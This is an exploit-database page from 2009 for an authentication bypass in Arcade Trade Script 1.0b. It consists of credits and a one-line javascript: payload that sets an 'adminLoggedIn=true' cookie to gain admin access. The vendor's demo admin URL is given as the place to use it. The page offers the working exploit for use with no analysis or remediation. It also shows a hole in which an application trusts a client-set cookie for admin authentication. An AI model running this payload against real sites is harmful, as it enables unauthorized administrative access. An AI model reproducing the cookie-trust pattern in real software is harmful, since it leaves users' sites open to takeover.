[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln
# Published : 2009-08-24
# Author : Mr.tro0oqy
# Previous Title : Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability
# Next Title : PHP Dir Submit (aid) Remote SQL Injection Vulnerability


======================================================================
[??] Script : Arcade Trade Script v.1.0 Insecure Cookie Handling Vuln

[??] Language : php  

[??] Script site : http://www.arcadetradescript.com

[??] Founder: Mr.tro0oqy <- from Yemen

[??] Gr44tz to: [H]-> borken heart :(

[??] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------

javascript:document.cookie="adminLoggedIn=true;path=/";

--------
demo:
--------

http://www.arcadetradescript.com/demo/admin/
--------

# www.Syue.com [2009-08-24]